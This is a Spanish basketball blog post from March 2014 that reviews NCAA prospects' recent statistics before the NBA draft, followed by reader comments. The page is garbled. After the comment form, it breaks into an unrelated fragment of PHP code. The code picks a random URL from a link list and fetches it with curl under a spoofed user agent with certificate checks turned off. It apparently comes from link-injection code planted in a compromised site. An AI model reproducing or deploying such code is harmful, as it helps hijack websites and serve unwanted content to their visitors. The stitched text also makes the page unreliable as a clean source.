Seguimiento del draft 2014: Del 23 al 9 de Marzo

12 de March de 2014 por Viva_Dirk

Se acabó la “regular” en la NCAA. Este fin de semana se jugarán los diferentes torneos que definirán los ganadores de las 31 conferencias que componen la complicada liga universitaria americana. Todos estos campeones disputarán la famosa March Madness, una Copa del Rey a lo bestia que alcanza cotas de seguimiento inimaginables para los europeos cuando hablamos de deporte universitario. Además de estos 31 equipos, participan en la March Madness el campeón de la Ivy League (que se juega con un formato de liga, no hay torneo) y 36 equipos más elegidos por un comité de expertos. El domingo 16 es el “Selection Sunday”, el día que se hacen públicos los equipos seleccionados y el famoso bracket con los equipos organizados por regiones. Reiros pero este acto se retransmite en directo para todo el país y viene precedido de especiales de varias horas de duración. Como la Copa del Rey, vaya…

Como hemos comentado, solo tienen plaza asegurada los campeones de las conferencias aunque a la práctica hay muchos equipos que ya saben que aunque no ganen su torneo estarán en la March Madness. De todas maneras, hay equipos en la cuerda floja, cuya presencia o no puede depender de cómo lo han hecho durante la regular. El comité de expertos tiene en cuenta muchas cosas.

Sin más dilación repasemos como les ha ido a los diferentes equipos en este final de liga regular. Como siempre, fijándonos en los jugadores que más suenan para el draft. 

Kansas: 2-2 para ellos estos días. Joel Embiid se perdió los dos últimos partidos y no jugará el torneo de la Big 12 debido a unas molestias en su espalda. De esta manera se reserva para la March Madness. En los 2 partidos que disputó estuvo muy bien con 12,5 puntos, 13 rebotes, 2 tapones, 2,5 robos, 7 de 11 en tiros de campo y 11 de 13 en libres; En cambio, Andrew Wiggins ha sumado actuaciones más bien flojas aunque destaca el brutal de partido del sábado contra West Virginia en que el canadiense se fue a los 41 puntos y 9 rebotes. Este partido infló sus promedios que fueron de 20 puntos, 6.3 rebotes y 3.6 pérdidas; Wayne Shelden Jr estuvo en 10 puntos por noche y ha caído hasta los últimos puestos de 1era ronda.

Duke: 2-1 para los Blue Devils. Buenos números para Jabari Parker con 20 puntos, 11 rebotes y 2 tapones de media. Esta semana ha estado bien acompañado por Rodney Hood con 20,3 puntos, 3 rebotes y 3 asistencias que le mantienen en la mitad de la 1era ronda.

Kentucky: 1-3 y malas sensaciones antes de la March Madness. Julius Randle presenta un consistente 13-12 esta semana pero con un pobre porcentaje de tiro y sin sumar en ninguna otra faceta; James Young nos ha dejado un espeluznante 25% en tiros y 13 puntos por noche lo que le ha costado bajar unas cuantas posiciones; Willie Cauley Stein se quedó en 7 puntos y 7.6 rebotes y sigue bajando en los mocks.

Oklahoma State: 3-1 con victoria contra Kansas incluida. Tremendo regreso de Marcus Smart que con 20.7 puntos, 5,7 rebotes, 5,5 asistencias y 4 robos reclama un puesto en el top5. El jugador de segunda ronda, Markel Brown, ejerció de perfecto escudero con con 17 puntos, 7 rebotes y 4,7 asistencias.

Indiana: 2-3 para los Hoosiers. Noah Vonleh sólo disputó 3 partidos y dos de ellos renqueante debido a una lesión en el pie ha sido el motivo. En el partido que disputó sin problemas físicos hizo 18 puntos y 6 rebotes. Salvo que la lesión se agrave no debería influir en su posición en el draft. Si los Hoosiers no se llevan el Big Ten Tournament (algo muy difícil ahora mismo) es más que probable que no les veamos en la March Madness.

Arizona: 3-1 para uno de los grandes favoritos al título nacional. Los 15.2 puntos y 7.2 rebotes de Aaron Gordon no están mal pero si no mejora en la March Madness se le puede complicar entrar en el TOP-10. Buena semana para el junior Nick Johnson con 16.7 puntos, 5.3 rebotes y 3.7 asistencias.

Syracuse: Los Orange acaban la regular con un balance de 1-2  estos últimos días y de 2-4 desde que el equipo perdió la imbatibilidad el 19 de febrero. Mal momento para dudar. Tyler Ennis se salvó en lo personal con 17 puntos y 4,3 asistencias pero su compañero Jerami Grant jugó lesionado de la espalda los 2 primeros partidos (solo 13 minutos por noche) y el tercero ya no pudo disputarlo. Veremos donde queda esta lesión pero la competencia en la zona media de 1era ronda es feroz.

Michigan State: 0-2 para los Spartans. Gary Harris anotó 20 puntos  pero tuvo escasa aportación en otros aspectos; Andreian Payne estuvo por debajo de sus números con 8 puntos y 9 rebotes; El jugador de segunda ronda Keith Appling ha estado muy flojo.

Resto de jugadores de 1ª ronda

Doug McDermott sigue a lo suyo: 30.7 puntos y 8 rebotes con un partido de 45 puntos de por medio; Brutal también TJ Warren con 32.6 puntos y 5 rebotes de media en sus 3 partidos; Nik Stauskas sube algunos puestos gracias a sus 21.2 puntos en las 5 victorias consecutivas de Michigan; KJ McDaniels estuvo en sus números con 18 puntos, 7.5 rebotes y 2.2 tapones; Kyle Anderson sigue dando muestras de su versatilidad con 15 puntos, 9.6 rebotes, 4.6 asistencias, 2 robos y 3 pérdidas de media en 3 partidos; su compañero Zach LaVine vuelve a aparecer al final de 1era ronda. Sus 9.7 puntos de media (que incluyen 0 puntos con un 0 de 8 en el último partido) dejan claro que necesita algún año en más en la universidad ; Montrezl Harrell, de Louisville, con 21.2 puntos y 9.2 rebotes, ha tenido un gran final de RS; los bases Deonte Burton y Elfrid Payton protagonizan una gran subida: desde puestos cercanos al pick 40 hasta los últimos puestos de la 1era ronda. Burton se fue hasta los 21.3 puntos, 6 rebotes y 8 asistencias, mientras que Payton estuvo en 17.7 puntos, 8 rebotes, 5.3 asistencias, 2 robos y 3.6 pérdidas.

Segunda ronda

Tras comprobar el nivel de algunos jugadores no es de extrañar que los 17.3 puntos de CJ Wilcox se hayan quedado cortos y que el jugador haya bajado algunos puestos en los mocks; los Boilermakers de Purdue en los que juega AJ Hammons  han sufrido 3 derrotas estos días y acaban la temporada con solo 2 victorias en 13 partidos. El pívot promedió 11.4 puntos  7.4 rebotes y 3.4 tapones; Jahii Carsons estuvo bien con 19 puntos y 4 asistencias; Glenn Robinson III, con 14.8 puntos y 4.8 rebotes, parece que se va entonando de cara al momento cumbre de la temporada; Jordan Adams cogió el mando anotador de UCLA con 20.6 puntos. Atentos a este jugador aunque lo más probable es que espere al draft del 2015; el guard Jordan Clarkson estuvo en 14.5 puntos, 3.6 rebotes y 3.6 asistencias y su compañero de equipo Jabari Brown en 16.5 puntos y 4.2 rebotes; buen estado de forma el de Semaj Christon con 20.4 puntos y 4.5 asistencias; Roy Devyn Marble también estuvo a buen nivel con 19.4 puntos y 5 asistencias; Jarnell Stokes dejó unos sólidos 15.2 puntos y 9.2 rebotes y su compañero Jordan McRae también anotó 15.2 puntos; en cambio, malos partidos para Dwight Powell que se ha quedado en  9.5 puntos y 5.2 rebotes de media. LaQuinton Ross jugó bien con 20 puntos y 4.6 rebotes mientras que su compañero Aaron Craft ha estado en sus números con 9.6 puntos y 5 asistencias; Cory Jefferson promedió 14.7 puntos y 7.2 rebotes, y Russ Smith llega a tope a la MM con 18 puntos, 4 rebotes, 6.5 asistencias y 3.5 robos por partido en sus últimos 4 partido.

Internacionales

Dario Saric sigue llamando con fuerza a las puertas del top ten con 18 puntos y 11.5 rebotes, lo mismo prácticamente que Jusuf Nurkic que ha subido casi 10 puestos pese a su poca participación (10.5 puntos en 14 minutos de juego); el francés Clint Capela ya aparece entre los 15 mejores jugadores. No nos extraña con su promedio de 22 puntos, 10 rebotes y 4 asistencias; Bogdan Bogdanovic anotó 19 puntos en su vuelta a las pistas; gran rendimiento de Vasilije Micic con 16 puntos, 4.5 rebotes y 7.5 asistencias; Walter Tavares sube algunos puestos, promedió 9.6 puntos y 6 rebotes en los últimos 6 partidos; Alessandro Gentile promedió 14 puntos por noche.

Comenta

7 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Ruxixon:
    Hablando de Smart,hoy partido contra Texas Tech en la primera ronda del torneo de la BIG12,bastante importante para él en particular,pues aunque supongo que el comité invitará a los Cowboys no les vendrá mal hacer un gran torneo.

    Pues OKST pasó sin apuros la primera ronda del torneo,metiendo distancia con Texas Tech desde muy temprano,con Smart delegando en Markel Brown en labores anotadoras,aunque queda claro quien es el líder del equipo.18 puntos,7 rebotes,7 asistencias,6 robos y 0 pérdidas para Smart.Sin descanso alguno encaran ya el partido de hoy,partidazo,contra Kansas de los Wiggins & cia (no Embiid).SI no me equivoco a las 8 pm hora española.

    En general hay mucho partido interesante hoy (y próximos días) pues han entrado en liza los torneos de las conferencias más importantes.

      Citar

  2. txusma dice:
    #2

    Está acabando muy fuerte Smart… Eso q lo sacaran del algún TOP-5 de algunos mock para meter a Exum no le ha gustado nada.

      Citar

  3. Ruxixon dice:
    #3

    Indiana ha caido contra la gran defensa de los Illinois Fighters Illini esta tarde,lo que significa el adiós de Vonleh al torneo,casi con seguridad a la March Madness y si cumple lo que dicen los mocks,de la NCAA,lo que considero un error,pues le queda bastante por pulir -no lo veo de titular inmediato en la NBA- y el año que viene con el recruit de James Blackmon,que por lo que he leido es el mayor anotador de su clase,puede progresar bastante pues las defensas no se fijarán sólo sobre él,como ha pasado en el partido de esta tarde.Yo creo que puede desarrollar un tirito letal a media distancia -no le tiene miedo a tirar a distancia- y ser mucho más sólido en la faceta defensiva.

      Citar

  4. Ruxixon dice:
    #4

    C’est fini!Después de la prórroga ha ganado Kansas a Oklahoma ST,77-70,con una actuación extraordinaria y a la chita callando de Andrew Wiggins,30 puntos,8 rebotes,3 asistencias y otras tantos robos.La verdad es que el partido lo tenian ganando en el periodo ordinario pero un fallo de Wiggins sacando de línea de fondo que al final fue un triple y las acciones anterior y posterior dieron con un parcial de 7-0 que metieron a los Cowboys en el partido,pero en la prórroga no mostraron claridad en sus ataques.Smart 14 puntos con malos porcentajes,pero lo peor es que mostró esa versión “Westbrook 2.0” de tiros precipitados.

      Citar

  5. Ruxixon dice:
    #5

    ¡Larga vida a Doug McDermott!

      Citar

  6. txusma dice:
    #6

    Ruxixon:
    ¡Larga vida a Doug McDermott!

    ¡¡Robó un balón, robó un balon!! Se dispará su cotización en el draft…

    Te he enviado un correo Ruxixón. Ya dirás 😉

      Citar

  7. Viva_Dirk dice:
    #7

    Los 4 partidos que he visto completos a los Hoosiers puedo decir que han pasado de Vonleh como de la mierda. Ha recibido poquísimos balones y aun así ha hecho partidos buenos, muy serio en defensa y eficiente en ataque. Yo de el no me esperaba siempre que salga top10 que parece seguro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>